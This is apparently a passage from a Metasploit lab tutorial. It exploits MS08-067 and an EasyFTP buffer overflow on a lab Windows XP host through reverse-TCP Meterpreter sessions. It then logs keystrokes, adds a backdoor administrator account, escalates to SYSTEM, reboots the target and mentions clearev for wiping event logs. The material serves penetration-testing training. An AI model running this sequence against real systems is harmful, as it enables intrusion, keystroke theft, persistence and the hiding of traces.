generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ omitted ~
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection),
~ omitted ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.20.203
[*] Meterpreter session 3 opened (192.168.20.50:8080 -> 192.168.20.203:1053) at 2016-06-01 16:28:59 +0900
meterpreter > shell
Process 1284 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 로컬 영역 연결: <- Korean "Local Area Connection"; the raw transcript showed mojibake here because the XP command shell emits code page 949
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32>
C:\WINDOWS\system32> (ctrl+c)
Terminate channel 1? [y/N] y
meterpreter >
- Check the target's system information and running processes
meterpreter > sysinfo
Computer : WITH-15B28B4CFD
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
368 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
~ omitted ~
- Screenshot of the target's current screen (open the Kali file manager -> home directory to view it)
meterpreter > screenshot
Screenshot saved to: /root/DyxZRLRF.jpeg
- Keylogging on the target (run Notepad on Windows XP first). The session is migrated into notepad.exe before starting the recorder, because keylog_recorder only sees keystrokes delivered to the process it is running in.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ omitted ~
476 1216 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
~ omitted ~
meterpreter > migrate 476
[*] Migrating from 800 to 476...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WITH-15B28B4CFD
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
[*] Recording keystrokes..
@ Windows XP
- Type anything into Notepad on Windows XP
@ Kali Linux
[*] Keystrokes being saved in to /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
[*] Recording keystrokes...
(ctrl+c)
[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
(Terminal 2)
root@kali:~# ls -la /root/.msf5/loot
total 12
drwxr-xr-x 2 root root 4096 Jun 1 16:55 .
drwxr-xr-x 8 root root 4096 Jun 1 11:30 ..
-rw-r--r-- 1 root root 66 Jun 1 16:56 20160601165507_default_192.168.20.203_host.windows.key_817389.txt
root@kali:~# cat /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
Keystroke log started at 2016-06-01 16:55:07 +0900
beg
<Return>
root@kali:~#
- Forcibly terminate a program on the target
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ omitted ~
476 1216 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
~ omitted ~
meterpreter > kill 476
Killing: 476
meterpreter >
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.20.203 - Meterpreter session 4 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
Ex4) Exploiting an FTP vulnerability (Windows XP is running EasyFTP 1.7.0.11)
msf > search easyftp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great EasyFTP Server CWD Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_list_fixret 2010-07-05 great EasyFTP Server LIST Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_mkd_fixret 2010-04-04 great EasyFTP Server MKD Command Stack Buffer Overflow
exploit/windows/http/easyftp_list 2010-02-18 great EasyFTP Server list.html path Stack Buffer Overflow
msf > use exploit/windows/ftp/easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) >
msf exploit(easyftp_cwd_fixret) > show options
Module options (exploit/windows/ftp/easyftp_cwd_fixret):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Windows Universal - v1.7.0.2
msf exploit(easyftp_cwd_fixret) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ omitted ~
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection),
~ omitted ~
msf exploit(easyftp_cwd_fixret) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal - v1.7.0.2
1 Windows Universal - v1.7.0.3
2 Windows Universal - v1.7.0.4
3 Windows Universal - v1.7.0.5
4 Windows Universal - v1.7.0.6
5 Windows Universal - v1.7.0.7
6 Windows Universal - v1.7.0.8
7 Windows Universal - v1.7.0.9
8 Windows Universal - v1.7.0.10
9 Windows Universal - v1.7.0.11
msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(easyftp_cwd_fixret) > set target 9
target => 9
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.20.203
RHOST => 192.168.20.203
msf exploit(easyftp_cwd_fixret) > set LHOST 192.168.20.50
LHOST => 192.168.20.50
msf exploit(easyftp_cwd_fixret) > show options
Module options (exploit/windows/ftp/easyftp_cwd_fixret):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.20.203 yes The target address
RPORT 21 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
9 Windows Universal - v1.7.0.11
msf exploit(easyftp_cwd_fixret) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...
[*] Sending stage (957487 bytes) to 192.168.20.203
[*] Meterpreter session 6 opened (192.168.20.50:4444 -> 192.168.20.203:1056) at 2016-06-01 17:22:08 +0900
meterpreter >
- Create a backdoor account, add it to the Administrators group, then escalate the session itself to SYSTEM
meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user test test1234 /add (to remove it: net user test /delete)
net user test test1234 /add
C:\WINDOWS\system32>net user
net user
-------------------------------------------------------------------------------
admin Administrator ASPNET
Guest HelpAssistant IUSR_WITH-15B28B4CFD
IWAM_WITH-15B28B4CFD test
C:\WINDOWS\system32>net localgroup administrators test /add
net localgroup administrators test /add
C:\WINDOWS\system32>exit
exit
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- Reboot the target system (the session dies when the host goes down)
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ omitted ~
1216 1188 explorer.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\Explorer.EXE
1348 800 wuauclt.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\wuauclt.exe
~ omitted ~
meterpreter > migrate 1216
[*] Migrating from 1112 to 1216...
[*] Migration completed successfully.
meterpreter >
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.203 - Meterpreter session 1 closed. Reason: Died
msf exploit(easyftp_cwd_fixret) >
msf exploit(easyftp_cwd_fixret) > back
msf > exit
- Delete the msfdb database and create it again (this discards the hosts, services and loot collected during the lab)
root@kali:~# msfdb delete
root@kali:~#
root@kali:~# msfdb init
[Note] meterpreter session handling
- 'background' : temporarily return to the msf prompt, leaving the session open
- 'sessions -i <session number>' : return to that session's meterpreter prompt
- 'clearev' : clear the target's event logs (Application, System and Security)
[YouTube] video lecture link (Subscribe! Like!!!)
Metasploit - Chapter 1 Metasploit https://youtu.be/_7Yc4OM9bjU